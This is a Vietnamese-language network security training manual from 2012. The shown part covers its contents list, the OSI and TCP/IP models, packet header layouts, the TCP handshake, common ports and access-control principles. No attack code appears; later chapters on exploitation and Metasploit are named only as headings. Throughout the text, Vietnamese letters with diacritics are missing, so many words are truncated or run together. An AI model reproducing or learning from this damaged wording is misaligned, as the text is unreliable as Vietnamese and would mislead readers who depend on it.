You are on page 1of 259

TOCBATDAT SECURITY TON TP

Security ton tp Version 1.2 2012

Page | 1 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

BNG THEO DI THAY I Phin bn 1 Ngy cp nht 7/2012 Ngi cp nht Hong Tun t Ch thch First Release

Page | 2 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

Mc lc ti liu
I. MC CH V PHM VI TI LIU ............................................................................................. 9

1. 2. 1. 2.
a. b. c. d. e. f. g.

Mc ch ca ti liu ......................................................................................................... 9 Phm vi ti liu .................................................................................................................. 9 Khi nim c bn v an ton thng tin (security). ....................................................... 11 H thng mng c bn .................................................................................................... 11
M hnh mng OSI...................................................................................................................... 11 M hnh mng TCP/IP ................................................................................................................ 17 So snh m hnh TCP/IP v OSI ................................................................................................. 19 Cu to gi tin IP, TCP,UDP, ICMP .......................................................................................... 19 Mt s Port thng s dng........................................................................................................ 22 S dng cng c Sniffer phn tch gi tin IP, ICMP, UDP, TCP. ......................................... 22 Phn tch tng gi tin v ton phin kt ni................................................................................ 22

II. TNG QUAN V AN NINH MNG (SECURITY OVERVIEW) .............................................. 10

3.
a. b. c.

Khi nim v iu khin truy cp (Access Controls). .................................................. 23


Access Control Systems .............................................................................................................. 23 Nguyn tc thit lp Access Control ........................................................................................... 24 Cc dng Access Controls........................................................................................................... 24

4.
a. b.

Khi nim v Authentications ........................................................................................ 27


Nhng yu t nhn dng v xc thc ngi dng .................................................................. 27 Cc phng thc xc thc .......................................................................................................... 27

5.
a. b.

Authorization ................................................................................................................... 31
C bn v Authorization ............................................................................................................. 31 Cc phng thc Authorization .................................................................................................. 31

6. 7.
a. b. c.

Khi nim v Accounting ................................................................................................ 33 Tam gic bo mt CIA .................................................................................................... 34


Confidentiality ............................................................................................................................ 34 Integrity ....................................................................................................................................... 35 Availability ................................................................................................................................. 35

8.
a. b. c. d. e. f.

Mt m hc c bn .......................................................................................................... 36
Khi nim c bn v mt m hc ................................................................................................ 36 Hm bm Hash ......................................................................................................................... 36 M ha i xng Symmetric .................................................................................................... 37 M ha bt i xng Assymmetric .......................................................................................... 37 Tng quan v h thng PKI ........................................................................................................ 39 Thc hnh m ha v gii m vi cng c Cryptography tools.................................................. 42

Page | 3 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

9. Khi nim c bn v tn cng mng .................................................................................. 42


a. b. c. d. bc c bn ca mt cuc tn cng ............................................................................................ 42 Mt s khi nim v bo mt. ..................................................................................................... 44 Cc phng thc tn cng c bn ............................................................................................... 44 ch ca cc dng tn cng......................................................................................................... 45

III. INFRASTRUCTURE SECURITY (AN NINH H TNG). ........................................................ 47

1. 3. 4.

Cc gii php v l trnh xy dng bo mt h tng mng ........................................ 48 Thit k m hnh mng an ton ..................................................................................... 50 Router v Switch ............................................................................................................. 51

a. Chc nng ca Router ..................................................................................................................... 51 b. Chc nng ca Switch..................................................................................................................... 52 c. Bo mt trn Switch ........................................................................................................................ 52 d. Bo mt trn Router ........................................................................................................................ 52 e. Thit lp bo mt cho Router .......................................................................................................... 53

5.
a. b. c. d. e.

Firewall v Proxy ............................................................................................................ 58


Khi nim Firewall ..................................................................................................................... 58 Chc nng ca Firewall .............................................................................................................. 58 Nguyn l hot ng ca Firewall .............................................................................................. 59 Cc loi Firewall ......................................................................................................................... 60 Thit k Firewall trong m hnh mng........................................................................................ 61

6. 7.
a. b. c. d.

Cu hnh firewall IPtable trn Linux ............................................................................ 64 Ci t v cu hnh SQUID lm Proxy Server ............................................................. 68
Linux SQUID Proxy Server: ....................................................................................................... 68 Ci t: ........................................................................................................................................ 68 Cu hnh Squid:........................................................................................................................... 70 Khi ng Squid: ........................................................................................................................ 72

8.
a. b.

Trin khai VPN trn nn tng OpenVPN ..................................................................... 74


Tng quan v OpenVPN. ............................................................................................................ 74 Trin khai OpenVPN vi SSL trn mi trng Ubuntu linux .................................................... 75

9.
a. b. c.

ng dng VPN bo v h thng Wifi ............................................................................ 82


Cc phng thc bo mt Wifi ................................................................................................... 82 Thit lp cu hnh trn thit b Access Point v VPN Server 2003 ............................................ 83 To kt ni VPN t cc thit b truy cp qua Wifi...................................................................... 95

10.
a. a.

H thng pht hin v ngn chn truy cp bt hp php IDS/IPS .......................... 100
Nguyn l phn tch gi tin ....................................................................................................... 100 Ci t v cu hnh Snort lm IDS/IPS ..................................................................................... 104

Page | 4 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

11.
a. b. c. d. e. f. g. h. i. j.

Ci t v cu hnh Sourcefire IPS ............................................................................. 111


Tnh nng ca h thng IPS Sourcefire .................................................................................... 111 M hnh trin khai in hnh h thng IDS/IPS ........................................................................ 113 Nguyn l hot ng ca h thng IDS/IPS Sourcefire ............................................................ 114 Thit lp cc thng s qun tr cho cc thit b Sourcefire ....................................................... 117 Upgrade cho cc thit b Sourcefire .......................................................................................... 118 Cu hnh cc thit lp h thng (System settings) .................................................................... 118 Thit lp qun tr tp trung cho cc thit b Sourcefire ............................................................. 122 Cu hnh Interface Sets v Detection Engine. ........................................................................... 124 Qun tr v thit lp chnh sch cho IPS ................................................................................... 127 Phn tch Event v IPS .............................................................................................................. 143

12.
a. b. c.

Endpoint Security.......................................................................................................... 147


Gii php Kaspersky Open Space Security (KOSS) ................................................................. 147 Tnh nng ca gi Kaspersky Endpoint Security ...................................................................... 148 Lab ci t KSC v Endpoint Security cho my trm .............................................................. 149

13. 14. 15.


a. b. c.

Data Loss Prevent.......................................................................................................... 149 Network Access Control ............................................................................................... 151 Bo mt h iu hnh ................................................................................................... 154
Bo mt cho h iu hnh Windows ......................................................................................... 154 Lab: S dng Ipsec Policy bo v mt s ng dng trn Windows ..................................... 156 Bo v cho h iu hnh Linux ................................................................................................. 156

16.
a. b. c. d.

Chnh sch an ninh mng. ............................................................................................ 159


Yu cu xy dng chnh sch an ninh mng. ............................................................................ 159 Quy trnh tng quan xy dng chnh sch tng quan: .............................................................. 159 H thng ISMS ......................................................................................................................... 160 ISO 27000 Series ...................................................................................................................... 161

IV. AN TON NG DNG ................................................................................................................. 164

1.
a. b. c. d. e. f. g.

Bo mt cho ng dng DNS ......................................................................................... 164


S dng DNS Forwarder........................................................................................................... 164 S dng my ch DNS lu tr. ................................................................................................. 165 S dng DNS Advertiser .......................................................................................................... 165 S dng DNS Resolver. ............................................................................................................ 166 Bo v b nh m DNS .......................................................................................................... 166 Bo mt kt ni bng DDNS..................................................................................................... 166 Ngng chy Zone Transfer ....................................................................................................... 167

Page | 5 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

h. S dng Firewall kim sot truy cp DNS.................................................................................... 167 i. Ci t kim sot truy cp vo Registry ca DNS ......................................................................... 167 j. Ci t kim sot truy cp vo file h thng DNS ......................................................................... 168

2.

Bo mt cho ng dng Web ......................................................................................... 168

a. Gii thiu ..................................................................................................................................... 168 b. Cc l hng trn dch v Web ................................................................................................... 168 c. Khai thc l hng bo mt tng h iu hnh v bo mt cho my ch Web ...................... 169 d. Khai thc l hng trn Web Service ......................................................................................... 171 e. Khai thc l hng DoS trn Apache 2.0.x -2.0.64 v 2.2.x 2.2.19 ..................................... 173 f. Khai thc l hng trn Web Application .................................................................................. 173

3.

An ton dch v Mail Server ........................................................................................ 175

a. Gii thiu tng quan v SMTP, POP, IMAP ................................................................................ 175 b. Cc nguy c b tn cng khi s dng Email ...................................................................................................... 185

4. 5.
a. b. c. d. e. f. g. h. V.

Bo mt truy cp t xa ................................................................................................. 187 L hng bo mt Buffer overflow v cch phng chng ........................................... 187
L thuyt ................................................................................................................................... 187 M t k thut .......................................................................................................................... 188 V d c bn ............................................................................................................................. 188 Trn b nh m trn stack ..................................................................................................... 188 M ngun v d ........................................................................................................................ 189 Khai thc ................................................................................................................................... 190 Chng trn b m ................................................................................................................... 191 Thc hnh: ................................................................................................................................ 194

AN TON D LIU ...................................................................................................................... 194

1. An ton c s d liu .......................................................................................................... 194


a. b. c. d. e. f. S vi phm an ton c s d liu. ............................................................................................ 195 Cc mc an ton c s d liu............................................................................................ 195 Nhng quyn hn khi s dng h c s d liu. ....................................................................... 196 Khung nhn mt c ch bo v ................................................................................................ 197 Cp php cc quyn truy nhp .................................................................................................. 198 Kim tra du vt ........................................................................................................................ 201

2. Gim st thng k c s d liu ........................................................................................ 201 3. Phng thc an ton c s d liu.................................................................................... 208
VI. CC CNG C NH GI V PHN TCH MNG ............................................................. 212

1.

K nng Scan Open Port .............................................................................................. 212

a. Nguyn tc truyn thng tin TCP/IP ............................................................................................. 212

Page | 6 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

b. Nguyn tc Scan Port trn mt h thng. ..................................................................................... 214 c. Scan Port vi Nmap. ..................................................................................................................... 216

2.
a. b. c.

Scan l hng bo mt trn OS ...................................................................................... 219


S dng Nmap Scan l hng bo mt ca OS ..................................................................... 219 S dng Nessus Scan l hng bo mt ca OS .................................................................... 220 S dng GFI Scan l hng bo mt ca OS ......................................................................... 228

3.
a. b.

Scan l hng bo mt trn Web ................................................................................... 231


S dng Acunetix scan l hng bo mt trn Web .............................................................. 232 Lab S dng IBM App Scan Scan l hng bo mt trn Web ............................................. 234

4.
a. b. c. d. e.

K thut phn tch gi tin v nghe nn trn mng..................................................... 234


Bn cht ca Sniffer .................................................................................................................. 234 M hnh phn tch d liu chuyn nghip cho doanh nghip ................................................... 235 Mi trng Hub ........................................................................................................................ 236 K thut Sniffer trong mi trng Switch ................................................................................ 236 M hnh Sniffer s dng cng c h tr ARP Attack ............................................................... 239

5.
a. b. c.

Cng c khai thc l hng Metasploit ......................................................................... 240


Gii thiu tng quan v cng c Metasploit ............................................................................. 240 S dng Metasploit Farmwork ................................................................................................. 242 Kt lun ..................................................................................................................................... 248

6.
d. e.

S dng Wireshark v Colasoft phn tch gi tin ................................................. 248


S dng Wireshark phn tch gi tin v traffic ca h thng mng ..................................... 248 S dng Colasoft phn tch traffic ca h thng mng ........................................................ 252

VII. KT LUN ...................................................................................................................................... 259

Page | 7 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

Bng cc thut ng s dng trong ti liu STT 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 Thut ng ATTT Security Vit y An ton thng tin Bo Mt Mt vi thng tin

Page | 8 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

I.

MC CH V PHM VI TI LIU

1. Mc ch ca ti liu
L ti liu o to v An ton thng tin cho cc cn b vn hnh v qun tr mng ca ABC.Cung cp y cho hc vin cc khi nim, m hnh h thng, cu hnh trin khai cc gii php, qun l ri ro v nhiu kin thc khc v An ton thng tin.

2. Phm vi ti liu
L ti liu c vit ring cho kha hc An ton thng tin cho cc cn b ca ABC

Page | 9 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

II.

TNG QUAN V AN NINH MNG (SECURITY OVERVIEW)


1. 2. 3. 4. 5. 6. 7. 8. Khi nim c bn v an ton thng tin (security). H thng mng c bn Khi nim v iu khin truy cp (Access Controls). Khi nim v Authentications Authorization Khi nim v Accounting Tam gic bo mt CIA Mt m hc c bn

9. Khi nim c bn v tn cng mng

Page | 10 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

1. Khi nim c bn v an ton thng tin (security).


Mt s t chc ln trn th gii a ra cc khi nim v Security Bo Mt hay An ton thng tin nh sau: Bo mt hay an ton thng tin l mc bo v thng tin trc cc mi e ra v thng tn l, thng tin khng cn ton vn v thng tin khng sn sng. Bo mt hay an ton thng tin l mc bo v chng li cc nguy c v mt an ton thng tin nh nguy him, thit hi, mt mt v cc ti phm khc. Bo mt nh l hnh thc v mc bo v thng tin bao gm cu trc v qu trnh x l nng cao bo mt. T chc Institute for Security and Open Methodologies nh ngha Security l hnh thc bo v, ni tch bit gia ti nguyn v nhng mi e ra.

2. H thng mng c bn
a. M hnh mng OSI
Khi mt ng dng hay mt dch v hot ng phc v cc nhu cu trao i thng tin ca ngi dng, h thng mng s hot ng vic trao i thng tin c din ra vi nhng quy tc ring. Khi nhn vo si dy mng hay cc thit b khng dy con ngi s khng th hiu c nhng nguyn tc truyn thng tin . d dng hiu cc nguyn tc, nguyn l phc ph qu trnh nghin cu, pht trin ng dng cng nh khc phc s c mng t chc tiu chun th gii dng m hnh OSI nh l mt tiu chun ISO. M hnh OSI (Open Systems Interconnection Reference Model, vit ngn l OSI Model hoc OSI Reference Model) - tm dch l M hnh tham chiu kt ni cc h thng m - l mt thit k da vo nguyn l tng cp, l gii mt cch tru tng k thut kt ni truyn thng gia cc my vi tnh v thit k giao thc mng gia chng. M hnh ny c pht trin thnh mt phn trong k hoch Kt ni cc h thng m (Open Systems Interconnection) do ISO v IUT-T khi xng. N cn c gi l M hnh by tng ca OSI. (Ngun Wikipedia).

Page | 11 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

Mc ch ca m hnh OSI: M hnh OSI phn chia chc nng ca mt giao thc ra thnh mt chui cc tng cp. Mi mt tng cp c mt c tnh l n ch s dng chc nng ca tng di n, ng thi ch cho php tng trn s dng cc chc nng ca mnh. Mt h thng ci t cc giao thc bao gm mt chui cc tng ni trn c gi l "chng giao thc" (protocol stack). Chng giao thc c th c ci t trn phn cng, hoc phn mm, hoc l t hp ca c hai. Thng thng th ch c nhng tng thp hn l c ci t trong phn cng, cn nhng tng khc c ci t trong phn mm. M hnh OSI ny ch c ngnh cng nghip mng v cng ngh thng tin tn trng mt cch tng i. Tnh nng chnh ca n l quy nh v giao din gia cc tng cp, tc qui nh c t v phng php cc tng lin lc vi nhau. iu ny c ngha l cho d cc tng cp c son tho v thit k bi cc nh sn xut, hoc cng ty, khc nhau nhng khi c lp rp li, chng s lm vic mt cch dung ha (vi gi thit l cc c t c thu o mt cch ng n). Trong cng ng TCP/IP, cc c t ny thng c bit n vi ci tn RFC (Requests for Comments, dch st l " ngh duyt tho v bnh lun"). Trong cng ng OSI, chng l cc tiu chun ISO (ISO standards). Thng th nhng phn thc thi ca giao thc s c sp xp theo tng cp, tng t nh c t ca giao thc ra, song bn cnh , c nhng trng hp ngoi l, cn c gi l "ng ct ngn" (fast path). Trong kin to "ng ct ngn", cc giao dch thng dng nht, m h thng cho php, c ci t nh mt thnh phn n, trong tnh nng ca nhiu tng c gp li lm mt. Vic phn chia hp l cc chc nng ca giao thc khin vic suy xt v chc nng v hot ng ca cc chng giao thc d dng hn, t to iu kin cho vic thit k cc chng giao thc t m, chi tit, song c tin cy cao. Mi tng cp thi hnh v cung cp cc dch v cho tng ngay trn n, ng thi i hi dch v ca tng ngay di n. Nh ni trn, mt thc thi bao gm nhiu tng cp trong m hnh OSI, thng c gi l mt "chng giao thc" (v d nh chng giao thc TCP/IP). M hnh tham chiu OSI l mt cu trc ph h c 7 tng, n xc nh cc yu cu cho s giao tip gia hai my tnh. M hnh ny c nh ngha bi T chc tiu chun ho quc t (International Organization for Standardization) trong tiu chun s 7498-1 Page | 12 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

(ISO standard 7498-1). Mc ch ca m hnh l cho php s tng giao (interoperability) gia cc h my (platform) a dng c cung cp bi cc nh sn xut khc nhau. M hnh cho php tt c cc thnh phn ca mng hot ng ha ng, bt k thnh phn y do ai to dng. Vo nhng nm cui thp nin 1980, ISO tin c vic thc thi m hnh OSI nh mt tiu chun mng. Ti thi im , TCP/IP c s dng ph bin trong nhiu nm. TCP/IP l nn tng ca ARPANET, v cc mng khc - l nhng ci c tin ha v tr thnh Internet. (Xin xem thm RFC 871 bit c s khc bit ch yu gia TCP/IP v ARPANET.) Hin nay ch c mt phn ca m hnh OSI c s dng. Nhiu ngi tin rng i b phn cc c t ca OSI qu phc tp v vic ci t y cc chc nng ca n s i hi mt lng thi gian qu di, cho d c nhiu ngi nhit tnh ng h m hnh OSI i chng na. Chi tit cc tng ca m hnh OSI: Tng 1: Tng vt l: Tng vt l nh ngha tt c cc c t v in v vt l cho cc thit b. Trong bao gm b tr ca cc chn cm (pin), cc hiu in th, v cc c t v cp ni (cable). Cc thit b tng vt l bao gm Hub, b lp (repeater), thit b tip hp mng (network adapter) v thit b tip hp knh my ch (Host Bus Adapter)(HBA dng trong mng lu tr (Storage Area Network)). Chc nng v dch v cn bn c thc hin bi tng vt l bao gm: Thit lp hoc ngt mch kt ni in

Page | 13 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

(electrical connection) vi mt [[mi trng truyn dnphng tintruyn thng (transmission medium). Tham gia vo quy trnh m trong cc ti nguyn truyn thng c chia s hiu qu gia nhiu ngi dng. Chng hn gii quyt tranh chp ti nguyn (contention) v iu khin lu lng. iu bin (modulation), hoc bin i gia biu din d liu s (digital data) ca cc thit b ngi dng v cc tn hiu tng ng c truyn qua knh truyn thng (communication channel). Cp (bus) SCSI song song hot ng tng cp ny. Nhiu tiu chun khc nhau ca Ethernet dnh cho tng vt l cng nm trong tng ny; Ethernet nhp tng vt l vi tng lin kt d liu vo lm mt. iu tng t cng xy ra i vi cc mng cc b nh Token ring, FDDI v IEEE 802.11.]] Tng 2: Tng lin kt d liu (Data Link Layer) Tng lin kt d liu cung cp cc phng tin c tnh chc nng v quy trnh truyn d liu gia cc thc th mng, pht hin v c th sa cha cc li trong tng vt l nu c. Cch nh a ch mang tnh vt l, ngha l a ch (a ch MAC) c m ha cng vo trong cc th mng (network card) khi chng c sn xut. H thng xc nh a ch ny khng c ng cp (flat scheme). Ch : V d in hnh nht l Ethernet. Nhng v d khc v cc giao thc lin kt d liu (data link protocol) l cc giao thc HDLC; ADCCP dnh cho cc mng im-ti-im hoc mng chuyn mch gi (packet-switched networks) v giao thc Aloha cho cc mng cc b. Trong cc mng cc b theo tiu chun IEEE 802, v mt s mng theo tiu chun khc, chng hn FDDI, tng lin kt d liu c th c chia ra thnh 2 tng con: tng MAC (Media Access Control - iu khin Truy nhp ng truyn) v tng LLC (Logical Link Control - iu khin Lin kt Lgic) theo tiu chun IEEE 802.2. Tng lin kt d liu chnh l ni cc cu ni (bridge) v cc thit b chuyn mch (switches) hot ng. Kt ni ch c cung cp gia cc nt mng c ni vi nhau trong ni b mng. Tuy nhin, c lp lun kh hp l cho rng thc ra cc thit b ny thuc v tng 2,5 ch khng hon ton thuc v tng 2.

Page | 14 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

Tng 3: Tng mng (Network Layer) Tng mng cung cp cc chc nng v qui trnh cho vic truyn cc chui d liu c di a dng, t mt ngun ti mt ch, thng qua mt hoc nhiu mng, trong khi vn duy tr cht lng dch v (quality of service) m tng giao vn yu cu. Tng mng thc hin chc nng nh tuyn, .Cc thit b nh tuyn (router) hot ng ti tng ny gi d liu ra khp mng m rng, lm cho lin mng tr nn kh thi (cn c thit b chuyn mch (switch) tng 3, cn gi l chuyn mch IP). y l mt h thng nh v a ch lgic (logical addressing scheme) cc gi tr c chn bi k s mng. H thng ny c cu trc ph h. V d in hnh ca giao thc tng 3 l giao thc IP. Tng 4: Tng giao vn (Transport Layer) Tng giao vn cung cp dch v chuyn dng chuyn d liu gia cc ngi dng ti u cui, nh cc tng trn khng phi quan tm n vic cung cp dch v truyn d liu ng tin cy v hiu qu. Tng giao vn kim sot tin cy ca mt kt ni c cho trc. Mt s giao thc c nh hng trng thi v kt ni (state and connection orientated). C ngha l tng giao vn c th theo di cc gi tin v truyn li cc gi b tht bi. Mt v d in hnh ca giao thc tng 4 l TCP. Tng ny l ni cc thng ip c chuyn sang thnh cc gi tin TCP hoc UDP. tng 4 a ch c nh l address ports, thng qua address ports phn bit c ng dng trao i. Tng 5: Tng phin (Session layer) Tng phin kim sot cc (phin) hi thoi gia cc my tnh. Tng ny thit lp, qun l v kt thc cc kt ni gia trnh ng dng a phng v trnh ng dng xa. Tng ny cn h tr hot ng song cng (duplex) hoc bn song cng (half-duplex) hoc n cng (Single) v thit lp cc qui trnh nh du im hon thnh (checkpointing) gip vic phc hi truyn thng nhanh hn khi c li xy ra, v im hon thnh c nh du - tr hon (adjournment), kt thc (termination) v khi ng li (restart). M hnh OSI u nhim cho tng ny trch nhim "ngt mch nh nhng" (graceful close) cc phin giao dch (mt tnh cht ca giao thc kim sot giao vn TCP) v trch nhim kim tra v phc hi phin, y l phn thng khng c dng n trong b giao thc TCP/IP.

Page | 15 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

Tng 6: Tng trnh din (Presentation layer) Lp trnh din hot ng nh tng d liu trn mng. lp ny trn my tnh truyn d liu lm nhim v dch d liu c gi t tng Application sang dng Fomat chung. V ti my tnh nhn, lp ny li chuyn t Fomat chung sang nh dng ca tng Application. Lp th hin thc hin cc chc nng sau: - Dch cc m k t t ASCII sang EBCDIC. - Chuyn i d liu, v d t s interger sang s du phy ng. - Nn d liu gim lng d liu truyn trn mng. - M ho v gii m d liu m bo s bo mt trn mng. Tng 7: Tng ng dng (Application layer) Tng ng dng l tng gn vi ngi s dng nht. N cung cp phng tin cho ngi dng truy nhp cc thng tin v d liu trn mng thng qua chng trnh ng dng. Tng ny l giao din chnh ngi dng tng tc vi chng trnh ng dng, v qua vi mng. Mt s v d v cc ng dng trong tng ny bao gm Telnet, Giao thc truyn tp tin FTP v Giao thc truyn th in t SMTP, HTTP, X.400 Mail remote M hnh m t d hiu m hnh OSI vi cc hnh thc trao i thng tin thc t:

Page | 16 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

b. M hnh mng TCP/IP


TCP/IP (ting Anh: Internet protocol suite hoc IP suite hoc TCP/IP protocol suite b giao thc lin mng), l mt b cc giao thc truyn thng ci t chng giao thc m Internet v hu ht cc mng my tnh thng mi ang chy trn . B giao thc ny c t tn theo hai giao thc chnh ca n l TCP (Giao thc iu khin Giao vn) v IP (Giao thc Lin mng). Chng cng l hai giao thc u tin c nh ngha. Nh nhiu b giao thc khc, b giao thc TCP/IP c th c coi l mt tp hp cc tng, mi tng gii quyt mt tp cc vn c lin quan n vic truyn d liu, v cung cp cho cc giao thc tng cp trn mt dch v c nh ngha r rng da trn vic s dng cc dch v ca cc tng thp hn. V mt lgic, cc tng trn gn vi ngi dng hn v lm vic vi d liu tru tng hn, chng da vo cc giao thc tng cp di bin i d liu thnh cc dng m cui cng c th c truyn i mt cch vt l.

Page | 17 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

M hnh OSI miu t mt tp c nh gm 7 tng m mt s nh sn xut la chn v n c th c so snh tng i vi b giao thc TCP/IP. S so snh ny c th gy nhm ln hoc mang li s hiu bit su hn v b giao thc TCP/IP. Tng ng dng: Gm cc ng dng: DNS, TFTP, TLS/SSL, FTP, HTTP, IMAP, IRC, NNTP, POP3, SIP, SMTP, SNMP, SSH, TELNET, ECHO, BitTorrent, RTP, PNRP, rlogin, ENRP, Cc giao thc nh tuyn nh BGP v RIP, v mt s l do, chy trn TCP v UDP - theo th t tng cp: BGP dng TCP, RIP dng UDP - cn c th c coi l mt phn ca tng ng dng hoc tng mng. Tng giao vn: Gm cc giao thc:TCP, UDP, DCCP, SCTP, IL, RUDP, Cc giao thc nh tuyn nh OSPF (tuyn ngn nht c chn u tin), chy trn IP, cng c th c coi l mt phn ca tng giao vn, hoc tng mng. ICMP (Internet control message protocol| - tm dch l Giao thc iu khin thng ip Internet) v IGMP (Internet group management protocol - tm dch l Giao thc qun l nhm Internet) chy trn IP, c th c coi l mt phn ca tng mng. Tng mng: Giao thc: IP (IPv4, IPv6) ARP (Address Resolution Protocol| - tm dch l Giao thc tm a ch) v RARP (Reverse Address Resolution Protocol - tm dch l Giao thc tm a ch ngc li) hot ng bn di IP nhng trn tng lin kt (link layer), vy c th ni l n nm khong trung gian gia hai tng. Page | 18 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

Tng lin kt: Gm cc giao thc: Ethernet, Wi-Fi, Token ring, PPP, SLIP, FDDI, ATM, Frame Relay, SMDS,

c. So snh m hnh TCP/IP v OSI


M hnh n gin hn m hnh OSI vn th hin c qu trnh giao tip trn mng. M hnh TCP/IP c chia lm 4 Layer OSI Model 7. Application 6. Presentation 5. Session 4. Transport 3. Network 2. Data Link 1. Physical TCP/IP Model 4. Application

3. Transport 2. Internet 1. Network Access

d. Cu to gi tin IP, TCP,UDP, ICMP


phc v cng tc nghin cu v Security cn phi hiu r cu to gi tin cc layer c th hiu v phn tch gi tin.

M hnh ng gi thng tin cc Layer ca m hnh TCP/IP

Page | 19 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

Cu to gi tin IPv4 y l cu to ca gi tin IPv4, gm phn Header v data. Header bao gm 160 hoc 192 bits phn cn li l Data. Phn a ch l 32bits

Cu to gi tin IPv6: Gi tin IPv6 cng gm hai phn l Hearder v Data. Phn Header ca gi tin bao gm 40 octec (320bits), trong a ch IPv6 l 128bit.

Cu to ca gi tin TCP:

Page | 20 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

Cu to ca gi tin TCP bao gm hai phn Header v Data. Trong phn Header l 192bit. Ba bc bt u kt ni TCP: + Bc I: Client bn n Server mt gi tin SYN + Bc II: Server tr li ti Client mt gi tin SYN/ACK + Bc III: Khi Client nhn c gi tin SYN/ACK s gi li server mt gi ACK v qu trnh trao i thng tin gia hai my bt u. Bn bc kt thc kt ni TCP: + Bc I: Client gi n Server mt gi tin FIN ACK + Bc II: Server gi li cho Client mt gi tin ACK + Bc III: Server li gi cho Client mt gi FIN ACK + Bc IV: Client gi li cho Server gi ACK v qu trnh ngt kt ni gia Server v Client c thc hin. Cu to gi tin UDP: G i t i UDP bao gm hai phn Header v Data, trong phn Header gm 64bit.

Page | 21 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

Cu to gi tin ICMP Type (8 bits) [8 bt s dng nhn din loi ICMP] Code (8 bits) [Mi Type c th c nhng code c th ring miu t cho dng ] Checksum (16 bits) [Checksum gm 16bits] Message (Khng c nh) [Ph thuc vo type v code]

e. Mt s Port thng s dng


nhiu dch v c th cng lc giao tip trn mt kt ni, mi dch v c s dng mt port nht nh. Khi nghin cu v Security chng ta cng nn c mt s kin thc v cc port hay c s dng: Protocol FTP SSH Telnet SMTP DNS TFTP HTTP POP3 SNMP HTTPS SMB NetBIOS VPN Remote Desktop Port 20/21 22 23 25 53 69 80 110 161/162 443 445 135,137,139 1723,500 3389

f. S dng cng c Sniffer phn tch gi tin IP, ICMP, UDP, TCP.
Thc hnh: Ci t Wireshark v Colasoft phn tch

g. Phn tch tng gi tin v ton phin kt ni


Thc hnh: Ci t Wireshark v Colasoft phn tch

Page | 22 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

3. Khi nim v iu khin truy cp (Access Controls).


Trc khi c cp thm quyn mi ngi u truy cp vi quyn user Anonymouse. Sau khi ngi dng c xc thc (Authentication) s c h thng cp cho thm quyn s dng ti nguyn (Authorization) v ton b qu trnh truy cp ca ngi dng s c gim st v ghi li (Accounting).

a. Access Control Systems


Ti nguyn ch c th truy cp bi nhng c nhn c xc thc. Qu trnh qun l truy cp ti nguyn ca ngi dng cn thc hin qua cc bc: Identification: Qu trnh nhn dng ngi dng, ngi dng cung cp cc thng tin cho h thng nhn dng. Authentication: Bc xc thc ngi dng, ngi dng cung cp cc thng tin xc nhn dng, h thng tin hnh xc thc bng nhiu phng thc khc nhau. Authorization:Thm quyn truy cp ti nguyn c h thng cp cho ngi dng sau khi xc thc Authentication. Accounting: H thng gim st v thng k qu trnh truy cp ca ngi dng vo cc vng ti nguyn. Tt c cc h thng iu khin truy cp (access control systems) u phi c ba yu t c bn nht: Subjects: Ton b i tng c th gn quyn truy cp. C th coi y l User/Group trong h thng Objects: Ti nguyn c s dng. Access Permissions c s dng gn quyn truy cp cc Objects cho Subjects. (V d mt User l mt Subject, mt foder l mt Object, Permission l quyn gn cho User truy cp vo Folder). Bng Access Permissions cho mt i tng gi l Access Control List (ACLs), ACL ca ton b h thng c thng k trong bng Access Control Entries (ACEs).

Page | 23 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

b. Nguyn tc thit lp Access Control


Ngi lm v chnh sch bo mt cn phi a ra cc nguyn tc qun tr ti nguyn h thng m bo: Bo mt nht cho ti nguyn, p ng c cng vic ca ngi dng. Cc nguyn tc c chia ra: Principle of Least Privilege Ngi dng (Subjects) c gn quyn nh nht (minimum permissions) vi cc ti nguyn (Object) v vn m bo c cng vic. Principle of Separation of Duties and Responsibilities Cc h thng quan trng cn phi phn chia thnh cc thnh phn khc nhau d dng phn quyn iu khin hp l. Principle of Need to Know Ngi dng ch truy cp vo nhng vng ti nguyn m h cn v c hiu bit v ti nguyn m bo cho cng vic ca h.

c. Cc dng Access Controls


Ti nguyn c nhiu dng, ngi dng c nhiu i tng vy chng ta cn phi s dng nhng dng iu khin truy cp d liu hp l. Mandatory Access Control (MAC) + L phng thc iu khin da vo Rule-Base gn quyn truy cp cho cc i tng. + Vic gn quyn cho cc i tng da vo vic phn chia ti nguyn ra cc loi khc nhau (classification resources). + Phng thc iu khin truy cp ny thng p dng cho: t chc chnh ph, cng ty + V d: mt cng ty sn xut bia cc vng ti nguyn c chia: Public (website), Private (d liu k ton), Confidential (cng thc nu bia). Mi vng ti nguyn s c nhng i tng c truy cp ring, v vic iu khin truy cp ny chnh l Mandatory Access Control.

Page | 24 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

